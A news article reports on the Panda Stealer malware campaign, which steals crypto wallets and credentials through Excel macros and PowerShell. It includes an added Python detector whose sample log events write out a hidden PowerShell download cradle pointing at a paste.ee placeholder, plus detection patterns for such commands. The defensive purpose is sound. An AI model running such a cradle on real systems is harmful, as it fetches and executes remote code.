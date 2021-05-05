Infosecurity Group Websites
Panda Stealer Targets Crypto Wallets

A new information stealer is going after cryptocurrency wallets and credentials for applications including NordVPN, Telegram, Discord, and Steam.

Panda Stealer uses spam emails and the same hard-to-detect fileless distribution method deployed by a recent Phobos ransomware campaign discovered by Morphisec.

The attack campaign appears to be primarily targeting users in Australia, Germany, Japan, and the United States.

Panda Stealer was discovered by Trend Micro at the start of April. Threat researchers have identified two infection chains being used by the campaign.

They said: "In one, an .XLSM attachment contains macros that download a loader. Then, the loader downloads and executes the main stealer. 

"The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command."
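As an added illustration, not code from the article or from Trend Micro or Morphisec, the following Python flags the pattern of that second chain in constructed Sysmon-style process-creation events: Excel spawning a script host whose command line reaches a paste site or uses hidden, encoded or download-cradle PowerShell switches. The event format, field names and the paste.ee URL path are assumptions.

```python
import re

# Constructed sample events in a simplified "key=value|key=value" Sysmon style;
# they are illustrative only, not telemetry from the reports cited in the article.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE|"
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "CommandLine=powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('https://paste.ee/r/PLACEHOLDER')\"",
    "ParentImage=C:\\Windows\\explorer.exe|"
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "CommandLine=powershell -File C:\\scripts\\inventory.ps1",
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE|"
    "Image=C:\\Windows\\System32\\cmd.exe|"
    "CommandLine=cmd /c powershell -EncodedCommand PLACEHOLDERBASE64==",
]

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Paste sites used as staging hosts (paste.ee is the one named in the article).
PASTE_SITES = re.compile(r"paste\.ee|pastebin\.com|hastebin", re.I)
# Hidden window, encoded command, or an in-memory download cradle.
SUSPICIOUS_FLAGS = re.compile(
    r"-(?:e|enc|encodedcommand)\b|-w(?:indowstyle)?\s+hidden|downloadstring|\biex\b", re.I)

def parse_event(line):
    """Turn 'Key=Value|Key=Value' into a dict (assumed log layout)."""
    return dict(field.split("=", 1) for field in line.split("|"))

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return the list of reasons an event looks like Office-to-PowerShell staging."""
    parent, image = basename(event.get("ParentImage", "")), basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")
    if PASTE_SITES.search(cmd):
        reasons.append("command line references a paste site")
    if SUSPICIOUS_FLAGS.search(cmd):
        reasons.append("hidden/encoded/download-cradle PowerShell switches")
    return reasons

def triage(events):
    """Return (child image, reasons) for every event that trips at least one rule."""
    findings = []
    for line in events:
        ev = parse_event(line)
        reasons = score_event(ev)
        if reasons:
            findings.append((basename(ev.get("Image", "")), reasons))
    return findings

if __name__ == "__main__":
    for image, reasons in triage(SAMPLE_EVENTS):
        print(image, "->", "; ".join(reasons))
```

The benign explorer.exe-launched script is not flagged, while both Excel-spawned events are, the first on all three rules.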

Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum.

Other cards up Panda's sleeve are the ability to take screenshots of the infected computer and the power to exfiltrate browser data such as cookies, passwords, and saved card details.

Researchers linked the campaign to an IP address assigned to a virtual private server rented from Shock Hosting. Shock Hosting said that the server assigned to this address has been suspended. 

Panda Stealer was determined to be a variant of Collector Stealer, cracked by Russian threat actor NCP, also known as su1c1de. 

"Because the cracked Collector Stealer builder is openly accessible online, cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C&C panel," noted researchers.

While the two stealers behave similarly, they have different command and control server URLs, build tags, and execution folders.

CTO Michael Gorelik, who heads the threat intelligence team for Morphisec, has seen the number of infostealers shoot up since the Emotet network was disrupted.

When analyzing the different types of attacks Morphisec detected across seven million enterprise endpoints over the last 12 months, Gorelik found that infostealers made up the highest percentage of attempted endpoint attacks (31%). 
